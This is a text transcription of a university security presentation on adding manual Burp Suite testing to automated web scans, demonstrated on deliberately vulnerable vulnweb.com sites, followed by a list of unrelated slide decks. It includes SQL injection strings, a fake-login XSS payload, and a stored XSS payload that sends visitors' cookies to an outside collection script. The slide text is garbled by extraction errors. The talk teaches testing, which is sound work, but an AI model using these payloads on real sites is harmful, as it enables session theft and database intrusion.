burp suite and beyond automated scanning vs manual tes ng
play

Burp Suite and Beyond Automated Scanning vs Manual - PowerPoint PPT Presentation

Mar 11, 2023 •604 likes •837 views

Adding Value to Automated Web Scans Burp Suite and Beyond Automated Scanning vs Manual Tes;ng Manual Tes;ng Tools/Suites At MSU -

  1. Adding ¡Value ¡to ¡Automated ¡Web ¡Scans ¡ ¡ ¡ Burp ¡Suite ¡and ¡Beyond ¡

  2. Automated ¡Scanning ¡vs ¡Manual ¡Tes;ng ¡ • Manual ¡Tes;ng ¡Tools/Suites ¡ • At ¡MSU ¡-­‑ ¡QualysGuard ¡WAS ¡& ¡Burp ¡Suite ¡ • Automated ¡Scanning ¡-­‑ ¡iden;fy ¡aCack ¡surface ¡accross ¡ organiza;on ¡ ¡ • Manual ¡Tes;ng ¡-­‑ ¡proxy ¡tools ¡used ¡to ¡verify ¡scan ¡ results ¡and ¡find ¡what ¡automated ¡scans ¡miss ¡ ¡ • Both ¡necessary ¡in ¡a ¡large ¡enviroment ¡

  3. Automated ¡Scanning ¡vs ¡Manual ¡Tes;ng ¡ Strengths ¡of ¡Automated ¡Scanners: ¡ ¡ • Scheduling ¡ ¡ • Repor;ng ¡ • Scalability ¡ Strengths ¡of ¡Manual ¡Scanners: ¡ • Proxy ¡based ¡-­‑ ¡allows ¡intercep;on ¡of ¡requests ¡ • Customize ¡payloads ¡for ¡vulnerability ¡detec;on ¡ ¡ ¡ • Verify ¡findings ¡from ¡automated ¡scan ¡results. ¡

  4. Automated ¡Scanning ¡vs ¡Manual ¡Tes;ng ¡ Weaknesses ¡of ¡automated ¡scanners: ¡ ¡ • increased ¡poten;al ¡for ¡false ¡posi;ves ¡ • duplicate ¡findings ¡ • code ¡coverage ¡not ¡as ¡thourough ¡ Weaknesses ¡of ¡manual ¡scanning: ¡ • tester ¡needs ¡knowledge ¡of ¡applica;on ¡for ¡best ¡results ¡ • learning ¡curve ¡(developers ¡already ¡stretched ¡thin) ¡ • not ¡scalable ¡(e.g. ¡distribu;ng ¡reports ¡is ¡very ¡;me ¡consuming) ¡

  5. ¡Methodology ¡ Reconnaissance ¡ Spider ¡target ¡ Hidden ¡Files ¡ Google ¡site ¡search ¡ ¡ ¡ ¡End ¡result ¡is ¡a ¡comprehensive ¡map ¡of ¡site ¡ ¡ Discovery ¡ ¡ ¡ Automated ¡Scanning ¡ ¡ ¡Manual ¡Detec;on ¡and ¡Analysis ¡ ¡ Exploit ¡ ¡ ¡ ¡ ¡ Automated ¡Exploit ¡tools ¡ ¡-­‑ ¡ sqlmap, ¡havij, ¡metasploit ¡ ¡ ¡ ¡Burp ¡Suite ¡-­‑ ¡hands-­‑on ¡tes=ng ¡ 5 ¡

  6. Road ¡Map ¡ Spider ¡and ¡vulnerability ¡scan ¡already ¡performed ¡ ¡ Leverage ¡Burp ¡tools ¡to ¡expand ¡upon ¡proof ¡of ¡concepts ¡from ¡scan ¡ results ¡ ¡ Carry ¡out ¡actual ¡aCack ¡scenarios ¡ 6 ¡

  7. Tools ¡for ¡this ¡Demo ¡ BurpSuite ¡ Firefox ¡ ¡ FoxyProxy ¡addon ¡ Firebug ¡addon ¡ ¡ Target: ¡ ¡ ¡ *.vulnweb.com ¡(inten;onally ¡vulnerable ¡websites ¡from ¡ Acune;x) ¡

  8. Scan ¡Results ¡ § Vulnerabilty ¡reports ¡-­‑ ¡proof ¡of ¡concept ¡(POC) ¡include ¡ request ¡payload ¡and ¡applica;on ¡response ¡ § POCs ¡are ¡not ¡intui;ve, ¡o\en ¡met ¡with ¡doubt ¡ § Need ¡to ¡be ¡able ¡to ¡drive ¡home ¡the ¡real ¡risk ¡ ¡

  9. Scan ¡Report ¡-­‑ ¡XSS ¡example ¡

  10. Scan ¡Report ¡-­‑ ¡SQLi ¡Example ¡

  11. SQL ¡Injec;on ¡ Boolean ¡Based ¡SQLi ¡ ¡ (Blind ¡SQL ¡Injec;on) ¡ ¡ ¡ Blind ¡SQLi ¡is ¡possible ¡if ¡applica;on ¡will ¡respond ¡to ¡true ¡and ¡false ¡condi;ons ¡ in ¡a ¡detectable ¡manner* ¡ ¡ ¡ ¡ ¡ hCp://testphp.vulnweb.com/listproducts.php?ar;st=1 ¡and ¡1=1 ¡//true ¡condi;on ¡ ¡ hCp://testphp.vulnweb.com/listproducts.php?ar;st=1 ¡and ¡1=2 ¡//false ¡condi;on ¡ ¡ ¡ ` ¡ *Differences ¡between ¡true ¡and ¡false ¡responses ¡could ¡be ¡subtle. ¡The ¡ comparer ¡tool ¡highlights ¡ the ¡differences ¡between ¡two ¡responses ¡ ¡ ¡ Error ¡Based ¡ ¡ SQLi ¡ Possible ¡if ¡applica;on ¡echos ¡database ¡errors ¡to ¡browser. ¡ ¡ Errors ¡to ¡reveal ¡informa;on ¡about ¡database ¡that ¡serve ¡as ¡clues ¡for ¡building ¡an ¡ aCack. ¡ ¡ 11 ¡

  12. Demo ¡-­‑ ¡SQLi ¡ A ¡BeBer ¡Blind ¡SQLi ¡Proof ¡of ¡Concept ¡ hCp://testphp.vulnweb.com/listproducts.php?ar;st=1 ¡and ¡substring(@@version, 1,1)=4 ¡and ¡1=1 ¡ ¡// ¡false ¡ ¡ hCp://testphp.vulnweb.com/listproducts.php?ar;st=1 ¡and ¡substring(@@version, 1,1)=5 ¡and ¡1=1 ¡//true ¡

  13. SQLi ¡Exploit ¡Example ¡ A ¡BeBer ¡Error ¡Based ¡SQLi ¡POC ¡ ¡ testphp.vulnweb.com/listproducts.php?ar=st=1' ¡ -­‑ ¡ error ¡ vulnweb.com/listproducts.php?ar=st=1 ¡union ¡all ¡select ¡1,2,3,4,5,6,7,8,9,10 ¡-­‑ ¡ error ¡ vulnweb.com/listproducts.php?ar=st=1 ¡union ¡all ¡select ¡1,2,3,4,5,6,7,8,9,10,11 ¡-­‑ ¡ no ¡error! ¡ vulnweb.com/listproducts.php?ar=st=1 ¡union ¡all ¡select ¡1,2,3,4,5,6,7,8,9,10,11 ¡from ¡ users ¡-­‑ ¡ no ¡error! ¡

  14. Cross ¡Site ¡Scrip;ng ¡ ¡ XSS ¡type ¡0 ¡-­‑ ¡DOM ¡Based ¡– ¡aCack ¡string ¡embedded ¡in ¡URL ¡and ¡not ¡processed ¡ by ¡the ¡server. ¡Executed ¡in ¡the ¡DOM ¡client-­‑side ¡(very ¡much ¡like ¡reflected) ¡ ¡ ¡ XSS ¡type ¡1 ¡– ¡Reflected ¡ – ¡aCack ¡string ¡is ¡submiCed ¡with ¡request ¡(usually ¡in ¡URL) ¡ and ¡the ¡server ¡embeds ¡the ¡string ¡in ¡the ¡HTML ¡of ¡the ¡response ¡ ¡ ¡ *DOM ¡based ¡and ¡reflected ¡depend ¡on ¡social ¡engineering ¡to ¡succeed ¡ ¡ ¡ XSS ¡type ¡2 ¡-­‑ ¡Persistent ¡(stored) ¡XSS ¡– ¡the ¡applica;on ¡stores ¡the ¡aCack ¡ string ¡so ¡that ¡it ¡is ¡presented ¡in ¡future ¡responses ¡ ¡ 14 ¡

  15. Reflected ¡XSS ¡Demo ¡ Target: ¡ hCp://testasp.vulnweb.com/Search.asp ¡?mSearch= ¡ ¡ Goal: ¡modify ¡page ¡to ¡look ¡like ¡login ¡ ¡ Payload: ¡ ¡ /Search.asp?mSearch= ¡ <script>document.getElementsByClassName('FramedForm').item(0).innerHTML ¡= ¡ "password ¡<div ¡><input ¡type='password' ¡id='pw' ¡/><input ¡type='buCon' ¡ onclick='alert(pw.value)' ¡value='login' ¡/></div>"; ¡ document.getElementsByClassName('path').item(0).innerHTML ¡= ¡'';</script> ¡ ¡ *Requires ¡social ¡engineering. ¡Obfuscate ¡the ¡query ¡string ¡to ¡hide ¡script ¡

  16. Same ¡Origin ¡Policy ¡ Same ¡Origin ¡Policy ¡-­‑ ¡SOP ¡allows ¡you ¡to ¡make ¡requests ¡to ¡pages ¡ within ¡the ¡same ¡site/domain, ¡while ¡preven;ng ¡you ¡from ¡making ¡ requests ¡to ¡pages ¡on ¡a ¡different ¡domain. ¡Without ¡SOP ¡the ¡ internet ¡would ¡be ¡very ¡unsafe. ¡Visit ¡my ¡evil ¡site ¡and ¡I ¡can ¡direct ¡ your ¡browser ¡to ¡aCack ¡any ¡site ¡I ¡want. ¡ ¡ ¡ Goal ¡of ¡XSS ¡aCack ¡is ¡to ¡subvert ¡SOP ¡to ¡exfiltrate ¡informa;on ¡

  17. Bypassing ¡SOP ¡ ¡Image ¡source ¡ You ¡are ¡allowed ¡to ¡include ¡images ¡with ¡source ¡outside ¡of ¡the ¡applica;on's ¡domain ¡ ¡ <img ¡src=’evildomain.com? ¡id=’ ¡ ¡/> ¡the ¡src ¡is ¡an ¡HTTP ¡GET ¡request ¡ ¡ ¡ Example ¡XSS ¡ ¡ ¡ <div ¡onmouseover=”xssScript()” ¡><img ¡id='evil' ¡src='evildomain.com?id=' ¡ size='1px' ¡/></div> ¡ ¡ <script> ¡func;on ¡ ¡xssScript( ¡){ ¡ ¡………..}</script></div > ¡ 17 ¡

  18. Persistent ¡XSS ¡Demo ¡ ¡ Target: ¡ hCp://testphp.vulnweb.com/guestbook.php ¡ ¡ ¡ ¡ ¡ Goal : ¡Inject ¡javascript ¡and ¡image ¡to ¡bypass ¡SOP ¡ ¡ ¡ Objec=ve ¡is ¡to ¡send ¡cookie ¡to ¡my ¡evil ¡site: ¡ www.montana.edu/hardin/ cookiejar.php?d={cookie} ¡

  19. Persistent ¡XSS ¡Demo ¡ Payload: ¡ ¡ Hello<div ¡onmouseover=addsource() ¡style=’width:100%’> ¡<img ¡ ¡ ¡size='1px' ¡ ¡ id='badimg' ¡/></div> ¡there ¡ ¡ <script> ¡ ¡ ¡ func;on ¡addsource(){ ¡document.getElementById("badimg").src ¡= ¡"hCp:// www.montana.edu/hardin/cookiejar.php?d="+document.cookie; ¡ ¡} ¡</script> ¡ ¡ ¡ ¡

  20. SOP ¡has ¡been ¡subverted!!! ¡

  21. Ques;ons ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡hardin@montana.edu ¡

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Burp Suite Pro Real-life tips &amp; tricks Nicolas Grgoire Me &amp; Myself Founder &amp;

Burp Suite Pro Real-life tips &amp; tricks Nicolas Grgoire Me &amp; Myself Founder &amp;

Burp Suite Pro Real-life tips &amp; tricks Nicolas Grgoire Me &amp; Myself Founder &amp; owner of Agarri Lot of Web PenTesting NOT affiliated with PortSwigger Ltd Using Burp Suite for years And others proxies before Yes, I'm that old...

1.3k views • 105 slides
FamilySearch Scanning (Scanstone) An Automated Exposure Method For Scanning Microfilm Heath

FamilySearch Scanning (Scanstone) An Automated Exposure Method For Scanning Microfilm Heath

FamilySearch Scanning (Scanstone) An Automated Exposure Method For Scanning Microfilm Heath Nielson nielsonhe@ldschurch.org Digitizing Microfilm Scan as efficiently as possible At 30 minutes a roll, it would require a single scanner

471 views • 21 slides
Scanning In the old War Games film there is a teenager with an automated way of calling

Scanning In the old War Games film there is a teenager with an automated way of calling

Scanning In the old War Games film there is a teenager with an automated way of calling through all possible modem numbers in some range to find a computer which answers. (Some claim that a notorious hacker Kevin Mitnik was an inspiration

706 views • 28 slides
Automated vulnerability scanning and exploitation Dennis Pellikaan Thijs Houtenbos University of

Automated vulnerability scanning and exploitation Dennis Pellikaan Thijs Houtenbos University of

Automated vulnerability scanning and exploitation Dennis Pellikaan Thijs Houtenbos University of Amsterdam System and Network Engineering July 4, 2013 Dennis Pellikaan, Thijs Houtenbos Automated vulnerability scanning and exploitation 1 / 20

213 views • 20 slides
Htel Splendide Royal Junior Suite Junior Suite Junior Suite Suite Suite Suite Suite Suite

Htel Splendide Royal Junior Suite Junior Suite Junior Suite Suite Suite Suite Suite Suite

Htel Splendide Royal Junior Suite Junior Suite Junior Suite Suite Suite Suite Suite Suite 12 spacious Suites Junior Suite: 45m 2 Suite: 65m 2 Apartment Suite: 110m 2 Fine Italian Cuisine Renowned Chef Vito Grippa

498 views • 18 slides
Automated Waitlist Arrives at PSU Overview Review of Current Manual Waitlist Function

Automated Waitlist Arrives at PSU Overview Review of Current Manual Waitlist Function

Automated Waitlist Arrives at PSU Overview Review of Current Manual Waitlist Function Manual waitlist activates when enrollment cap reached. Slot is reserved for waitlist student when enrollment drops below cap. Departments

461 views • 22 slides
GuideAutomator: Automated User Manual Generation with Markdown Allan dos Santos Oliveira

GuideAutomator: Automated User Manual Generation with Markdown Allan dos Santos Oliveira

GuideAutomator: Automated User Manual Generation with Markdown Allan dos Santos Oliveira Supervisor: Prof. Rodrigo Rocha Gomes e Souza Department of Computer Science Federal University of Bahia 1 Introduction User experience as rising

453 views • 27 slides
Improving the Efficiency of Manual Ground Truth Labeling Using Automated Anatomy Segmentation

Improving the Efficiency of Manual Ground Truth Labeling Using Automated Anatomy Segmentation

Improving the Efficiency of Manual Ground Truth Labeling Using Automated Anatomy Segmentation Hongzhi Wang PhD, Prasanth Prasanna MD, Jose Morey MD, Tanveer F. Syeda-Mahmood PhD Medical Sieve Group, IBM Almaden Research Center Anatomy

469 views • 18 slides
From SOC to Analyst: bridging automated and manual analyses Practical Considerations and Issues

From SOC to Analyst: bridging automated and manual analyses Practical Considerations and Issues

From SOC to Analyst: bridging automated and manual analyses Practical Considerations and Issues July, 10th 2017 Raphal Rigo Typical (ideal) workflow of a malware sample reverser binary SOC CERT special malware malware SOC

89 views • 7 slides
GDC 2012 March 5-9 Runtime CPU Performance Spike Detection using Manual and Compiler Automated

GDC 2012 March 5-9 Runtime CPU Performance Spike Detection using Manual and Compiler Automated

GDC 2012 March 5-9 Runtime CPU Performance Spike Detection using Manual and Compiler Automated Instrumentation Adisak Pochanayon : adisak@wbgames.com Principal Software Engineer, Mortal Kombat Team Netherrealm Studios (WB Games Chicago) This

366 views • 9 slides
An Empirical Evaluation and Comparison of f Manual and Automated Test Selection Milos Gligoric,

An Empirical Evaluation and Comparison of f Manual and Automated Test Selection Milos Gligoric,

An Empirical Evaluation and Comparison of f Manual and Automated Test Selection Milos Gligoric, Stas Negara, Owolabi Legunsen, and Darko Marinov ASE 2014 Vsters, Sweden September 18, 2014 ITI RPS #28 CCF-1012759, CCF-1439957

762 views • 26 slides
Program Realisation 2 Todays Topics Unit testing, manual versus automated

Program Realisation 2 Todays Topics Unit testing, manual versus automated

Program Realisation 2 Todays Topics Unit testing, manual versus automated http://www.win.tue.nl/hemerik/2IP20/ ADT relationships: Lecture 4 Multiple implementations of the same ADT contract Kees Hemerik Generalization,

181 views • 7 slides
A Revisit of the Integration of Metamorphic Testing and Test Suite Based Automated Program

A Revisit of the Integration of Metamorphic Testing and Test Suite Based Automated Program

A Revisit of the Integration of Metamorphic Testing and Test Suite Based Automated Program Repair Mingyue Jiang 1,2, Tsong Yueh Chen 2, Fei-Ching Kuo 2, Zuohua Ding 1, Eun-Hye Choi 3, Osamu Mizuno 4 1 Zhejiang Sci-Tech University,

465 views • 19 slides
Automated Observation 4 4 Automated Observation what when what to observe to observe to

Automated Observation 4 4 Automated Observation what when what to observe to observe to

Asserting Expectations Andreas Zeller 1 Search in Time variables During execution, the state becomes infected. time Basic idea: Observe a transition from sane to infected. 2 2 Manual Observation 3 3 Automated

450 views • 15 slides
BurpSentinel Burp Extension Dobin Rutishauser Compass Security Schweiz AG bsidesvienna 2014

BurpSentinel Burp Extension Dobin Rutishauser Compass Security Schweiz AG bsidesvienna 2014

BurpSentinel Burp Extension Dobin Rutishauser Compass Security Schweiz AG bsidesvienna 2014 Version 0.4, 2014 Intro Uhm, welcome to bsides i guess? Glad you could make it this early! I hope everyone had his/her coffee Or wine

1.47k views • 128 slides
Automated Pavement Faulting Method AASHTO Presentation Outline: Faulting (AASHTO R-36)

Automated Pavement Faulting Method AASHTO Presentation Outline: Faulting (AASHTO R-36)

AASHTO Automated Pavement Faulting Method AASHTO Presentation Outline: Faulting (AASHTO R-36) Manual and Automated Methods Automated Faulting Program Accuracy and Precision Conclusion AASHTO TECHNOLOGY IMPLEMENTATION GROUP

731 views • 16 slides
Question for you 1. What can you use the HTTP Request for? 2. What is JSON? Pro Android S - Day

Question for you 1. What can you use the HTTP Request for? 2. What is JSON? Pro Android S - Day

Question for you 1. What can you use the HTTP Request for? 2. What is JSON? Pro Android S - Day 2 Today's Agenda 1. Integrate HTTP Request to the app 2. Parse JSON Data 3. Sharing Pro Android S - Day 2 HTTP Request &amp; Response Pro

461 views • 13 slides
Web Attacks Summary ITS335: IT Security Sirindhorn International Institute of Technology

Web Attacks Summary ITS335: IT Security Sirindhorn International Institute of Technology

ITS335 Web Attacks Web Apps OWASP Top 10 Risks Web Attacks Summary ITS335: IT Security Sirindhorn International Institute of Technology Thammasat University Prepared by Steven Gordon on 13 February 2014 its335y13s2l10,

575 views • 30 slides
ONLINE PRIVACY Ben Livshits, Microsoft Research Overview of Todays Lecture 2 Some of the

ONLINE PRIVACY Ben Livshits, Microsoft Research Overview of Todays Lecture 2 Some of the

ONLINE PRIVACY Ben Livshits, Microsoft Research Overview of Todays Lecture 2 Some of the current Ad ecosystem and problems in online user targeting privacy Solutions for tracking Tracking mechanisms prevention Cookies

737 views • 52 slides
6 Practical Aspects Web Applications Principles and Practice Vincent Simonet, 2014-2015

6 Practical Aspects Web Applications Principles and Practice Vincent Simonet, 2014-2015

Development of 6 Practical Aspects Web Applications Principles and Practice Vincent Simonet, 2014-2015 Vincent Simonet, 2014-2015 Universit Pierre et Marie Curie, Master Informatique, Spcialit STL Universit Pierre et Marie Curie,

1.12k views • 15 slides
6LoWPAN Applications and Internet of Things Reza Khoshdelniat MIMOS Bhd, Malaysia 30 th APAN

6LoWPAN Applications and Internet of Things Reza Khoshdelniat MIMOS Bhd, Malaysia 30 th APAN

6LoWPAN Applications and Internet of Things Reza Khoshdelniat MIMOS Bhd, Malaysia 30 th APAN Meeting Hanoi, Vietnam Outline Internet of things 6LoWPAN MIMOS activities Q&amp;A The Internet of Things Power Company Student Monitoring

498 views • 13 slides
Link layer security CS642: Computer Security Professor

Link layer security CS642: Computer Security Professor

Link layer security CS642: Computer Security Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu University of Wisconsin CS

606 views • 41 slides
DTN and Opportunistic Networking Concepts for EE Wireless Networks Karin Anna Hummel

DTN and Opportunistic Networking Concepts for EE Wireless Networks Karin Anna Hummel

DTN and Opportunistic Networking Concepts for EE Wireless Networks Karin Anna Hummel Communication Systems Group, ETH Zurich, karin.hummel@tik.ee.ethz.ch Thanks to: S. Trifunovic (and WLAN-Opp team: B. Distl, D. Schatzmann, F. Legendre), G.

678 views • 19 slides
Wireless Networking Carey Williamson Department of Computer Science University of Calgary

Wireless Networking Carey Williamson Department of Computer Science University of Calgary

Wireless Networking Carey Williamson Department of Computer Science University of Calgary (Slide content courtesy of David Schwab, U of S) What Is Wireless Networking? The use of infra-red or radio frequency signals to share information

438 views • 10 slides

More recommend